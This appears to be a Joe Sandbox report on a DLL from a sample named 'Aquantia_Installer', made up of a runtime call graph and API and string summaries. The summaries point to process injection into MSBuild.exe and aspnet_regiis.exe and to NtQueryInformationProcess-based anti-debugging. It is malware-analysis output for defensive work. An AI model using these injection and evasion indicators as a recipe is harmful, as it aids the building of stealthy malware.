11233->11240 11234->11235 11238 6cf38007 20 API calls 11234->11238 11239 6cf37f2e 11238->11239 11241 6cf38010 11240->11241 11244 6cf38523 11241->11244 11245 6cf38562 __startOneArgErrorHandling 11244->11245 11246 6cf385e4 __startOneArgErrorHandling 11245->11246 11252 6cf3892e 11245->11252 11249 6cf38619 11246->11249 11255 6cf38c47 11246->11255 11250 6cf2f0f0 _ValidateLocalCookies 5 API calls 11249->11250 11251 6cf3732e 11250->11251 11262 6cf38951 11252->11262 11256 6cf38c54 11255->11256 11257 6cf38c69 11255->11257 11258 6cf38c6e 11256->11258 11260 6cf32534 _free 14 API calls 11256->11260 11259 6cf32534 _free 14 API calls 11257->11259 11258->11249 11259->11258 11261 6cf38c61 11260->11261 11261->11249 11263 6cf3897c __raise_exc 11262->11263 11264 6cf38b75 RaiseException 11263->11264 11265 6cf3894c 11264->11265 11265->11246 11171 6cf33ead GetProcessHeap 11172 6cf34092 11173 6cf34097 11172->11173 11174 6cf340ba 11173->11174 11176 6cf35b3c 11173->11176 11177 6cf35b49 11176->11177 11178 6cf35b6b 11176->11178 11179 6cf35b57 DeleteCriticalSection 11177->11179 11180 6cf35b65 11177->11180 11178->11173 11179->11179 11179->11180 11181 6cf325a4 _free 14 API calls 11180->11181 11181->11178 11380 6cf2f3d3 ___scrt_dllmain_exception_filter 11266 6cf31657 11267 6cf3166f 11266->11267 11268 6cf31669 11266->11268 11269 6cf315ff 14 API calls 11268->11269 11269->11267 10568 6cf318d4 10569 6cf325a4 _free 14 API calls 10568->10569 10570 6cf318e2 10569->10570 10571 6cf325a4 _free 14 API calls 10570->10571 10572 6cf318f5 10571->10572 10573 6cf325a4 _free 14 API calls 10572->10573 10574 6cf31906 10573->10574 10575 6cf325a4 _free 14 API calls 10574->10575 10576 6cf31917 10575->10576 11527 6cf32794 11528 6cf327a4 11527->11528 11529 6cf327b8 11527->11529 11530 6cf32534 _free 14 API calls 11528->11530 11538 6cf3282f 11529->11538 11542 6cf328a8 11529->11542 11548 6cf32983 11529->11548 11531 6cf327a9 11530->11531 11533 6cf32477 __fassign 25 API calls 11531->11533 11532 6cf31482 14 API calls 11539 6cf32894 11532->11539 11536 6cf327b3 11533->11536 11535 6cf3289d 11537 6cf325a4 _free 14 API calls 11535->11537 11537->11542 11538->11532 11539->11535 11545 6cf32978 11539->11545 11566 6cf35551 11539->11566 11540 6cf32964 11543 6cf325a4 _free 14 API calls 11540->11543 11542->11540 11544 6cf325a4 _free 14 API calls 11542->11544 11543->11536 11544->11542 11546 6cf32487 __fassign 11 API calls 11545->11546 11547 6cf32982 11546->11547 11549 6cf3298f 11548->11549 11549->11549 11550 6cf32547 _free 14 API calls 11549->11550 11551 6cf329bd 11550->11551 11552 6cf35551 25 API calls 11551->11552 11553 6cf329e9 11552->11553 11554 6cf32487 __fassign 11 API calls 11553->11554 11555 6cf32a33 11554->11555 11556 6cf32c8b 37 API calls 11555->11556 11557 6cf32afb 11556->11557 11575 6cf32777 11557->11575 11560 6cf32b49 11561 6cf32c8b 37 API calls 11560->11561 11562 6cf32b86 11561->11562 11578 6cf326a8 11562->11578 11565 6cf32983 43 API calls 11570 6cf3549e 11566->11570 11567 6cf354b6 11568 6cf354ca 11567->11568 11569 6cf32534 _free 14 API calls 11567->11569 11568->11539 11571 6cf354c0 11569->11571 11570->11567 11570->11568 11573 6cf354ee 11570->11573 11572 6cf32477 __fassign 25 API calls 11571->11572 11572->11568 11573->11568 11574 6cf32534 _free 14 API calls 11573->11574 11574->11571 11601 6cf325f6 11575->11601 11579 6cf326d2 11578->11579 11580 6cf326b6 11578->11580 11581 6cf326f9 11579->11581 11583 6cf326d9 11579->11583 11582 6cf32cca 14 API calls 11580->11582 11584 6cf3389e ___scrt_uninitialize_crt WideCharToMultiByte 11581->11584 11597 6cf326c0 11582->11597 11583->11597 11631 6cf32ce4 11583->11631 11586 6cf32709 11584->11586 11587 6cf32710 GetLastError 11586->11587 11588 6cf32726 11586->11588 11590 6cf324fe __dosmaperr 14 API calls 11587->11590 11589 6cf32737 11588->11589 11591 6cf32ce4 15 API calls 11588->11591 11592 6cf3389e ___scrt_uninitialize_crt WideCharToMultiByte 11589->11592 11589->11597 11593 6cf3271c 11590->11593 11591->11589 11594 6cf3274f 11592->11594 11595 6cf32534 _free 14 API calls 11593->11595 11596 6cf32756 GetLastError 11594->11596 11594->11597 11595->11597 11598 6cf324fe __dosmaperr 14 API calls 11596->11598 11597->11565 11599 6cf32762 11598->11599 11600 6cf32534 _free 14 API calls 11599->11600 11600->11597 11602 6cf32604 11601->11602 11603 6cf3261e 11601->11603 11619 6cf32cca 11602->11619 11605 6cf32625 11603->11605 11606 6cf32644 11603->11606 11618 6cf3260e FindFirstFileExW 11605->11618 11623 6cf32d20 11605->11623 11607 6cf33822 __fassign MultiByteToWideChar 11606->11607 11609 6cf32653 11607->11609 11610 6cf3265a GetLastError 11609->11610 11611 6cf32680 11609->11611 11613 6cf32d20 15 API calls 11609->11613 11612 6cf324fe __dosmaperr 14 API calls 11610->11612 11614 6cf33822 __fassign MultiByteToWideChar 11611->11614 11611->11618 11615 6cf32666 11612->11615 11613->11611 11616 6cf32697 11614->11616 11617 6cf32534 _free 14 API calls 11615->11617 11616->11610 11616->11618 11617->11618 11618->11560 11620 6cf32cdd 11619->11620 11621 6cf32cd5 11619->11621 11620->11618 11622 6cf325a4 _free 14 API calls 11621->11622 11622->11620 11624 6cf32cca 14 API calls 11623->11624 11625 6cf32d2e 11624->11625 11628 6cf32d5f 11625->11628 11629 6cf3491d 15 API calls 11628->11629 11630 6cf32d3f 11629->11630 11630->11618 11632 6cf32cca 14 API calls 11631->11632 11633 6cf32cf2 11632->11633 11634 6cf32d5f 15 API calls 11633->11634 11635 6cf32d00 11634->11635 11635->11597 11636 6cf3599a 11637 6cf334cb 47 API calls 11636->11637 11638 6cf3599f 11637->11638 11381 6cf311d8 11382 6cf311e8 11381->11382 11383 6cf311ef 11381->11383 11384 6cf31210 11383->11384 11385 6cf311fa 11383->11385 11386 6cf334cb 47 API calls 11384->11386 11387 6cf32534 _free 14 API calls 11385->11387 11388 6cf31216 11386->11388 11389 6cf311ff 11387->11389 11405 6cf32f12 GetModuleFileNameW 11388->11405 11391 6cf32477 __fassign 25 API calls 11389->11391 11391->11382 11397 6cf31280 11400 6cf3130e 37 API calls 11397->11400 11398 6cf31274 11399 6cf32534 _free 14 API calls 11398->11399 11404 6cf31279 11399->11404 11401 6cf31298 11400->11401 11403 6cf325a4 _free 14 API calls 11401->11403 11401->11404 11402 6cf325a4 _free 14 API calls 11402->11382 11403->11404 11404->11402 11406 6cf32f52 11405->11406 11407 6cf32f41 GetLastError 11405->11407 11427 6cf32c8b 11406->11427 11408 6cf324fe __dosmaperr 14 API calls 11407->11408 11410 6cf32f4d 11408->11410 11413 6cf2f0f0 _ValidateLocalCookies 5 API calls 11410->11413 11414 6cf31229 11413->11414 11415 6cf3130e 11414->11415 11417 6cf31333 11415->11417 11419 6cf31393 11417->11419 11463 6cf337f1 11417->11463 11418 6cf3125e 11421 6cf31482 11418->11421 11419->11418 11420 6cf337f1 37 API calls 11419->11420 11420->11419 11422 6cf31493 11421->11422 11423 6cf3126b 11421->11423 11422->11423 11424 6cf32547 _free 14 API calls 11422->11424 11423->11397 11423->11398 11425 6cf314bc 11424->11425 11426 6cf325a4 _free 14 API calls 11425->11426 11426->11423 11428 6cf31acd __fassign 37 API calls 11427->11428 11429 6cf32c9d 11428->11429 11431 6cf32caf 11429->11431 11453 6cf33c55 11429->11453 11432 6cf32e10 11431->11432 11433 6cf32e2c 11432->11433 11449 6cf32e1d 11432->11449 11434 6cf32e34 11433->11434 11435 6cf32e59 11433->11435 11434->11449 11459 6cf32ed7 11434->11459 11436 6cf3389e ___scrt_uninitialize_crt WideCharToMultiByte 11435->11436 11437 6cf32e69 11436->11437 11439 6cf32e70 GetLastError 11437->11439 11440 6cf32e86 11437->11440 11441 6cf324fe __dosmaperr 14 API calls 11439->11441 11442 6cf32e97 11440->11442 11444 6cf32ed7 14 API calls 11440->11444 11443 6cf32e7c 11441->11443 11445 6cf3389e ___scrt_uninitialize_crt WideCharToMultiByte 11442->11445 11442->11449 11446 6cf32534 _free 14 API calls 11443->11446 11444->11442 11447 6cf32eaf 11445->11447 11446->11449 11448 6cf32eb6 GetLastError 11447->11448 11447->11449 11450 6cf324fe __dosmaperr 14 API calls 11448->11450 11449->11410 11451 6cf32ec2 11450->11451 11452 6cf32534 _free 14 API calls 11451->11452 11452->11449 11456 6cf33a7d 11453->11456 11457 6cf33b92 _free 5 API calls 11456->11457 11458 6cf33a93 11457->11458 11458->11431 11460 6cf32ee2 11459->11460 11461 6cf32534 _free 14 API calls 11460->11461 11462 6cf32eeb 11461->11462 11462->11449 11466 6cf3379a 11463->11466 11467 6cf31acd __fassign 37 API calls 11466->11467 11468 6cf337ae 11467->11468 11468->11417 10577 6cf314dd 10588 6cf334cb 10577->10588 10582 6cf314fa 10585 6cf325a4 _free 14 API calls 10582->10585 10586 6cf31529 10585->10586 10587 6cf325a4 _free 14 API calls 10587->10582 10589 6cf314ef 10588->10589 10590 6cf334d4 10588->10590 10594 6cf3398c GetEnvironmentStringsW 10589->10594 10623 6cf32065 10590->10623 10595 6cf339a3 10594->10595 10596 6cf339f9 10594->10596 10599 6cf3389e ___scrt_uninitialize_crt WideCharToMultiByte 10595->10599 10597 6cf33a02 FreeEnvironmentStringsW 10596->10597 10598 6cf314f4 10596->10598 10597->10598 10598->10582 10606 6cf3152f 10598->10606 10600 6cf339bc 10599->10600 10600->10596 10601 6cf3491d 15 API calls 10600->10601 10602 6cf339cc 10601->10602 10603 6cf339e4 10602->10603 10604 6cf3389e ___scrt_uninitialize_crt WideCharToMultiByte 10602->10604 10605 6cf325a4 _free 14 API calls 10603->10605 10604->10603 10605->10596 10607 6cf31544 10606->10607 10608 6cf32547 _free 14 API calls 10607->10608 10613 6cf3156b 10608->10613 10609 6cf315d0 10610 6cf325a4 _free 14 API calls 10609->10610 10611 6cf31505 10610->10611 10611->10587 10612 6cf32547 _free 14 API calls 10612->10613 10613->10609 10613->10612 10614 6cf315d2 10613->10614 10619 6cf315f2 10613->10619 10621 6cf325a4 _free 14 API calls 10613->10621 10963 6cf31a2f 10613->10963 10972 6cf315ff 10614->10972 10618 6cf325a4 _free 14 API calls 10618->10609 10978 6cf32487 IsProcessorFeaturePresent 10619->10978 10621->10613 10622 6cf315fe 10624 6cf32070 10623->10624 10625 6cf32076 10623->10625 10627 6cf33cf2 _free 6 API calls 10624->10627 10626 6cf33d31 _free 6 API calls 10625->10626 10629 6cf3207c 10625->10629 10628 6cf32090 10626->10628 10627->10625 10628->10629 10630 6cf32547 _free 14 API calls 10628->10630 10636 6cf320f5 10629->10636 10667 6cf31a89 10629->10667 10632 6cf320a0 10630->10632 10634 6cf320a8 10632->10634 10635 6cf320bd 10632->10635 10637 6cf33d31 _free 6 API calls 10634->10637 10638 6cf33d31 _free 6 API calls 10635->10638 10648 6cf33317 10636->10648 10640 6cf320b4 10637->10640 10639 6cf320c9 10638->10639 10641 6cf320cd 10639->10641 10642 6cf320dc 10639->10642 10645 6cf325a4 _free 14 API calls 10640->10645 10643 6cf33d31 _free 6 API calls 10641->10643 10644 6cf31da9 _free 14 API calls 10642->10644 10643->10640 10646 6cf320e7 10644->10646 10645->10629 10647 6cf325a4 _free 14 API calls 10646->10647 10647->10629 10762 6cf3342b 10648->10762 10678 6cf342bd 10667->10678 10670 6cf31a99 10672 6cf31aa3 IsProcessorFeaturePresent 10670->10672 10673 6cf31ac2 10670->10673 10675 6cf31aaf 10672->10675 10714 6cf311bb 10673->10714 10708 6cf322cb 10675->10708 10717 6cf341ef 10678->10717 10681 6cf34302 10682 6cf3430e ___scrt_is_nonwritable_in_current_image 10681->10682 10683 6cf320ff _free 14 API calls 10682->10683 10687 6cf3433b __fassign 10682->10687 10688 6cf34335 __fassign 10682->10688 10683->10688 10684 6cf34382 10685 6cf32534 _free 14 API calls 10684->10685 10686 6cf34387 10685->10686 10689 6cf32477 __fassign 25 API calls 10686->10689 10690 6cf343ae 10687->10690 10728 6cf3223b EnterCriticalSection 10687->10728 10688->10684 10688->10687 10691 6cf3436c 10688->10691 10689->10691 10694 6cf343f0 10690->10694 10695 6cf344e1 10690->10695 10705 6cf3441f 10690->10705 10691->10670 10694->10705 10729 6cf31fa8 GetLastError 10694->10729 10696 6cf344ec 10695->10696 10760 6cf32283 LeaveCriticalSection 10695->10760 10699 6cf311bb __fassign 23 API calls 10696->10699 10701 6cf344f4 10699->10701 10702 6cf31fa8 __fassign 37 API calls 10706 6cf34474 10702->10706 10704 6cf31fa8 __fassign 37 API calls 10704->10705 10756 6cf3448e 10705->10756 10706->10691 10707 6cf31fa8 __fassign 37 API calls 10706->10707 10707->10691 10709 6cf322e7 __DllMainCRTStartup@12 10708->10709 10710 6cf32313 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 10709->10710 10711 6cf323e4 __DllMainCRTStartup@12 10710->10711 10712 6cf2f0f0 _ValidateLocalCookies 5 API calls 10711->10712 10713 6cf32402 10712->10713 10713->10673 10715 6cf31061 __DllMainCRTStartup@12 23 API calls 10714->10715 10716 6cf311cc 10715->10716 10718 6cf341fb ___scrt_is_nonwritable_in_current_image 10717->10718 10723 6cf3223b EnterCriticalSection 10718->10723 10720 6cf34209 10724 6cf34247 10720->10724 10723->10720 10727 6cf32283 LeaveCriticalSection 10724->10727 10726 6cf31a8e 10726->10670 10726->10681 10727->10726 10728->10690 10730 6cf31fc5 10729->10730 10731 6cf31fbf 10729->10731 10733 6cf33d31 _free 6 API calls 10730->10733 10753 6cf31fcb SetLastError 10730->10753 10732 6cf33cf2 _free 6 API calls 10731->10732 10732->10730 10734 6cf31fe3 10733->10734 10735 6cf32547 _free 14 API calls 10734->10735 10734->10753 10737 6cf31ff3 10735->10737 10738 6cf32012 10737->10738 10739 6cf31ffb 10737->10739 10744 6cf33d31 _free 6 API calls 10738->10744 10742 6cf33d31 _free 6 API calls 10739->10742 10740 6cf32059 10740->10704 10741 6cf3205f 10743 6cf31a89 __fassign 35 API calls 10741->10743 10745 6cf32009 10742->10745 10746 6cf32064 10743->10746 10747 6cf3201e 10744->10747 10750 6cf325a4 _free 14 API calls 10745->10750 10748 6cf32033 10747->10748 10749 6cf32022 10747->10749 10752 6cf31da9 _free 14 API calls 10748->10752 10751 6cf33d31 _free 6 API calls 10749->10751 10750->10753 10751->10745 10754 6cf3203e 10752->10754 10753->10740 10753->10741 10755 6cf325a4 _free 14 API calls 10754->10755 10755->10753 10757 6cf34494 10756->10757 10758 6cf34465 10756->10758 10761 6cf32283 LeaveCriticalSection 10757->10761 10758->10691 10758->10702 10758->10706 10760->10696 10761->10758 10763 6cf33437 ___scrt_is_nonwritable_in_current_image 10762->10763 10764 6cf33451 10763->10764 10806 6cf3223b EnterCriticalSection 10763->10806 10766 6cf3332a 10764->10766 10769 6cf31a89 __fassign 37 API calls 10764->10769 10773 6cf330c1 10766->10773 10767 6cf3348d 10807 6cf334aa 10767->10807 10770 6cf334ca 10769->10770 10771 6cf33461 10771->10767 10772 6cf325a4 _free 14 API calls 10771->10772 10772->10767 10811 6cf31acd 10773->10811 10806->10771 10810 6cf32283 LeaveCriticalSection 10807->10810 10809 6cf334b1 10809->10764 10810->10809 10812 6cf31aed 10811->10812 10813 6cf31fa8 __fassign 37 API calls 10812->10813 10814 6cf31b0d 10813->10814 10818 6cf34ac7 10814->10818 10819 6cf31b23 10818->10819 10820 6cf34ada 10818->10820 10822 6cf34af4 10819->10822 10820->10819 10826 6cf34ed5 10820->10826 10823 6cf34b07 10822->10823 10824 6cf34b1c 10822->10824 10823->10824 10848 6cf33513 10823->10848 10827 6cf34ee1 ___scrt_is_nonwritable_in_current_image 10826->10827 10828 6cf31fa8 __fassign 37 API calls 10827->10828 10829 6cf34eea 10828->10829 10836 6cf34f30 10829->10836 10839 6cf3223b EnterCriticalSection 10829->10839 10831 6cf34f08 10840 6cf34f56 10831->10840 10836->10819 10837 6cf31a89 __fassign 37 API calls 10838 6cf34f55 10837->10838 10839->10831 10841 6cf34f64 _free 10840->10841 10843 6cf34f19 10840->10843 10842 6cf34c89 _free 14 API calls 10841->10842 10841->10843 10842->10843 10844 6cf34f35 10843->10844 10847 6cf32283 LeaveCriticalSection 10844->10847 10846 6cf34f2c 10846->10836 10846->10837 10847->10846 10849 6cf31fa8 __fassign 37 API calls 10848->10849 10850 6cf3351d 10849->10850 10851 6cf3342b __fassign 37 API calls 10850->10851 10852 6cf33523 10851->10852 10852->10824 10964 6cf31a3c 10963->10964 10967 6cf31a4a 10963->10967 10964->10967 10970 6cf31a61 10964->10970 10965 6cf32534 _free 14 API calls 10966 6cf31a52 10965->10966 10968 6cf32477 __fassign 25 API calls 10966->10968 10967->10965 10969 6cf31a5c 10968->10969 10969->10613 10970->10969 10971 6cf32534 _free 14 API calls 10970->10971 10971->10966 10976 6cf3160c 10972->10976 10977 6cf315d8 10972->10977 10973 6cf31623 10975 6cf325a4 _free 14 API calls 10973->10975 10974 6cf325a4 _free 14 API calls 10974->10976 10975->10977 10976->10973 10976->10974 10977->10618 10979 6cf32493 10978->10979 10980 6cf322cb __fassign 8 API calls 10979->10980 10981 6cf324a8 GetCurrentProcess TerminateProcess 10980->10981 10981->10622 11469 6cf34bc1 11472 6cf34b48 11469->11472 11473 6cf34b54 ___scrt_is_nonwritable_in_current_image 11472->11473 11480 6cf3223b EnterCriticalSection 11473->11480 11475 6cf34b8c 11481 6cf34baa 11475->11481 11477 6cf34b5e 11477->11475 11479 6cf34f56 __fassign 14 API calls 11477->11479 11479->11477 11480->11477 11484 6cf32283 LeaveCriticalSection 11481->11484 11483 6cf34b98 11484->11483 11270 6cf30440 11271 6cf3045e 11270->11271 11282 6cf30400 11271->11282 11283 6cf30412 11282->11283 11284 6cf3041f 11282->11284 11285 6cf2f0f0 _ValidateLocalCookies 5 API calls 11283->11285 11285->11284 11485 6cf307c0 11486 6cf307d2 11485->11486 11488 6cf307e0 11485->11488 11487 6cf2f0f0 _ValidateLocalCookies 5 API calls 11486->11487 11487->11488 11286 6cf31045 11287 6cf319d8 37 API calls 11286->11287 11288 6cf3104d 11287->11288 11352 6cf31a04 11353 6cf31a07 11352->11353 11354 6cf31a89 __fassign 37 API calls 11353->11354 11355 6cf31a13 11354->11355 11698 6cf3774b IsProcessorFeaturePresent 10982 6cf352c9 10985 6cf34ffe 10982->10985 10983 6cf2f0f0 _ValidateLocalCookies 5 API calls 10984 6cf3500b 10983->10984 10985->10983 10985->10985 11289 6cf35249 11292 6cf34ffe 11289->11292 11290 6cf2f0f0 _ValidateLocalCookies 5 API calls 11291 6cf3500b 11290->11291 11292->11290 11356 6cf33809 GetCommandLineA GetCommandLineW
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2353815089.000000006CF21000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF20000, based on PE: true
                                                                        • Associated: 00000000.00000002.2353800006.000000006CF20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353842214.000000006CF3A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353861216.000000006CF40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353916067.000000006CF8F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_6cf20000_Aquantia_Installer.jbxd
                                                                        Similarity
                                                                        • API ID: Virtual$Memory$Thread$CloseHandle$CreateWrite$AllocAllocateContext$ProcessResumeWindow$ConsoleReadShow
                                                                        • String ID: $%2$$%2$1(O$6L$m$6L$m$8Boc$<.:j$@$C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe$D$HWK5$MZx$OCUj$OCUj$\&zm$\&zm$kernel32.dll$ntdll.dll$oMi"$out`$w?M$w?M$}l.|
                                                                        • API String ID: 2504906999-3354862030
                                                                        • Opcode ID: b1aff970a5981a983126e8c97d6e53bec8ec97e8e9e675328aeffe4f12d538c8
                                                                        • Instruction ID: 685d9e00728c1a4891815473a733213ea0115762cc9f8a354d102f6a32c98b7a
                                                                        • Opcode Fuzzy Hash: b1aff970a5981a983126e8c97d6e53bec8ec97e8e9e675328aeffe4f12d538c8
                                                                        • Instruction Fuzzy Hash: 39D3E336B446608FDB08CE7CCD953DA77F2EB86311F218199D819DB794C63D8A898F81
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2353815089.000000006CF21000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF20000, based on PE: true
                                                                        • Associated: 00000000.00000002.2353800006.000000006CF20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353842214.000000006CF3A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353861216.000000006CF40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353916067.000000006CF8F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_6cf20000_Aquantia_Installer.jbxd
                                                                        Similarity
                                                                        • API ID: Handle$File$CloseModule$CreateCurrentNameProcessProtectVirtual$View
                                                                        • String ID: @$I$o`{M$tV}G$tV}G$|g(>$|g(>$7?C
                                                                        • API String ID: 2215009834-1989921014
                                                                        • Opcode ID: 8d3e6fbe2a23bdf29da357340e19d2a1babb9678aefcb61f8082ecbd0a4adc5d
                                                                        • Instruction ID: 01cfedfa64aee4660cc3a1720ce0a498036f80bb443c9d6fb39259c814206133
                                                                        • Opcode Fuzzy Hash: 8d3e6fbe2a23bdf29da357340e19d2a1babb9678aefcb61f8082ecbd0a4adc5d
                                                                        • Instruction Fuzzy Hash: C7331336B852108FDF558E7CC8A53DA7BF2AB46361F108199C429CB794C73E8E898F01

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1457 6cf25c40-6cf25c8a 1458 6cf25c91-6cf25c9c 1457->1458 1459 6cf25ca2-6cf25caf 1458->1459 1460 6cf2606a-6cf260c0 GetModuleHandleW 1458->1460 1463 6cf26223-6cf2622a 1459->1463 1464 6cf25cb5-6cf25cc2 1459->1464 1461 6cf2665c 1460->1461 1461->1458 1463->1461 1466 6cf25cc8-6cf25cd5 1464->1466 1467 6cf262b9-6cf262c9 1464->1467 1469 6cf25cdb-6cf25ce8 1466->1469 1470 6cf263c9-6cf263d0 1466->1470 1467->1461 1472 6cf263d5-6cf2641e 1469->1472 1473 6cf25cee-6cf25cfb 1469->1473 1470->1461 1472->1461 1475 6cf26643-6cf2664d 1473->1475 1476 6cf25d01-6cf25d0e 1473->1476 1475->1461 1478 6cf26652-6cf26655 1476->1478 1479 6cf25d14-6cf25d21 1476->1479 1478->1461 1481 6cf265f7-6cf26610 GetModuleHandleW 1479->1481 1482 6cf25d27-6cf25d34 1479->1482 1481->1461 1484 6cf265e2-6cf265f2 1482->1484 1485 6cf25d3a-6cf25d47 1482->1485 1484->1461 1487 6cf2622f-6cf2626a call 6cf2fd20 1485->1487 1488 6cf25d4d-6cf25d5a 1485->1488 1487->1461 1491 6cf25d60-6cf25d6d 1488->1491 1492 6cf261d5-6cf2621e 1488->1492 1495 6cf25d73-6cf25d80 1491->1495 1496 6cf26486-6cf2648d 1491->1496 1492->1461 1498 6cf25d86-6cf25d93 1495->1498 1499 6cf26584-6cf2659e call 6cf2f0f0 1495->1499 1496->1461 1503 6cf26423-6cf26475 1498->1503 1504 6cf25d99-6cf25da6 1498->1504 1503->1461 1506 6cf25f32-6cf25f78 1504->1506 1507 6cf25dac-6cf25db9 1504->1507 1506->1461 1509 6cf25dbf-6cf25dcc 1507->1509 1510 6cf25f7d-6cf25fee 1507->1510 1512 6cf26492-6cf26500 1509->1512 1513 6cf25dd2-6cf25ddf 1509->1513 1510->1461 1512->1461 1515 6cf25de5-6cf25df2 1513->1515 1516 6cf2616d-6cf261d0 call 6cf24160 1513->1516 1520 6cf260d1-6cf2611a 1515->1520 1521 6cf25df8-6cf25e05 1515->1521 1516->1461 1520->1461 1523 6cf25e0b-6cf25e18 1521->1523 1524 6cf265cd-6cf265dd 1521->1524 1526 6cf26615-6cf2663e call 6cf24160 1523->1526 1527 6cf25e1e-6cf25e2b 1523->1527 1524->1461 1526->1461 1530 6cf25e31-6cf25e3e 1527->1530 1531 6cf2659f-6cf265c8 call 6cf24160 1527->1531 1536 6cf25e44-6cf25e51 1530->1536 1537 6cf25fff-6cf26065 1530->1537 1531->1461 1539 6cf25e57-6cf25e64 1536->1539 1540 6cf26505-6cf26573 1536->1540 1537->1461 1542 6cf2647a-6cf26481 1539->1542 1543 6cf25e6a-6cf25e77 1539->1543 1540->1461 1542->1461 1545 6cf263b5-6cf263c4 1543->1545 1546 6cf25e7d-6cf25e8a 1543->1546 1545->1461 1548 6cf25e90-6cf25e9d 1546->1548 1549 6cf263a9-6cf263b0 1546->1549 1551 6cf25ea3-6cf25eb0 1548->1551 1552 6cf26578-6cf2657f 1548->1552 1549->1461 1554 6cf262e2-6cf26350 1551->1554 1555 6cf25eb6-6cf25ec3 1551->1555 1552->1461 1554->1461 1557 6cf26355-6cf263a4 1555->1557 1558 6cf25ec9-6cf25ed6 1555->1558 1557->1461 1560 6cf260c5-6cf260cc 1558->1560 1561 6cf25edc-6cf25ee9 1558->1561 1560->1461 1563 6cf2611f-6cf26168 1561->1563 1564 6cf25eef-6cf25efc 1561->1564 1563->1461 1566 6cf25f02-6cf25f0f 1564->1566 1567 6cf262ce-6cf262dd 1564->1567 1569 6cf25f15-6cf25f22 1566->1569 1570 6cf2626f-6cf262b4 NtQueryInformationProcess 1566->1570 1567->1461 1572 6cf25ff3-6cf25ffa 1569->1572 1573 6cf25f28-6cf25f2d 1569->1573 1570->1461 1572->1461 1573->1461
                                                                        APIs
                                                                        • GetModuleHandleW.KERNEL32 ref: 6CF26076
                                                                        • NtQueryInformationProcess.NTDLL ref: 6CF2629D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2353815089.000000006CF21000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF20000, based on PE: true
                                                                        • Associated: 00000000.00000002.2353800006.000000006CF20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353842214.000000006CF3A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353861216.000000006CF40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353916067.000000006CF8F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_6cf20000_Aquantia_Installer.jbxd
                                                                        Similarity
                                                                        • API ID: HandleInformationModuleProcessQuery
                                                                        • String ID: NtQueryInformationProcess$ntdll.dll
                                                                        • API String ID: 2776635927-2906145389
                                                                        • Opcode ID: 9dc155040fc3370eff16b567b623f398533316d0f47b1b6956f2d4270a123421
                                                                        • Instruction ID: e6f690b449458ba6cdb01488aff923b1f0b1af992b5324b9800902bb4e5c8294
                                                                        • Opcode Fuzzy Hash: 9dc155040fc3370eff16b567b623f398533316d0f47b1b6956f2d4270a123421
                                                                        • Instruction Fuzzy Hash: 10420F76E15205CFCB04CEFCC5957EE7FF2AB46314F208119E429EB794C63A990A8B85

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1407 6cf2f258-6cf2f26b call 6cf2fac0 1410 6cf2f271-6cf2f293 call 6cf2f6a0 1407->1410 1411 6cf2f26d-6cf2f26f 1407->1411 1415 6cf2f300-6cf2f319 call 6cf2f93a call 6cf2fac0 1410->1415 1416 6cf2f295-6cf2f2d8 call 6cf2f76b call 6cf2f627 call 6cf2fa89 call 6cf2f2ed call 6cf2f90c call 6cf2f2fa 1410->1416 1412 6cf2f2da-6cf2f2e9 1411->1412 1427 6cf2f32a-6cf2f331 1415->1427 1428 6cf2f31b-6cf2f321 1415->1428 1416->1412 1431 6cf2f333-6cf2f336 1427->1431 1432 6cf2f33d-6cf2f351 dllmain_raw 1427->1432 1428->1427 1430 6cf2f323-6cf2f325 1428->1430 1434 6cf2f403-6cf2f412 1430->1434 1431->1432 1435 6cf2f338-6cf2f33b 1431->1435 1437 6cf2f357-6cf2f368 dllmain_crt_dispatch 1432->1437 1438 6cf2f3fa-6cf2f401 1432->1438 1439 6cf2f36e-6cf2f380 call 6cf2e200 1435->1439 1437->1438 1437->1439 1438->1434 1446 6cf2f382-6cf2f384 1439->1446 1447 6cf2f3a9-6cf2f3ab 1439->1447 1446->1447 1450 6cf2f386-6cf2f3a4 call 6cf2e200 call 6cf2f258 dllmain_raw 1446->1450 1448 6cf2f3b2-6cf2f3c3 dllmain_crt_dispatch 1447->1448 1449 6cf2f3ad-6cf2f3b0 1447->1449 1448->1438 1451 6cf2f3c5-6cf2f3f7 dllmain_raw 1448->1451 1449->1438 1449->1448 1450->1447 1451->1438
                                                                        APIs
                                                                        • __RTC_Initialize.LIBCMT ref: 6CF2F29F
                                                                        • ___scrt_uninitialize_crt.LIBCMT ref: 6CF2F2B9
                                                                        Memory Dump Source
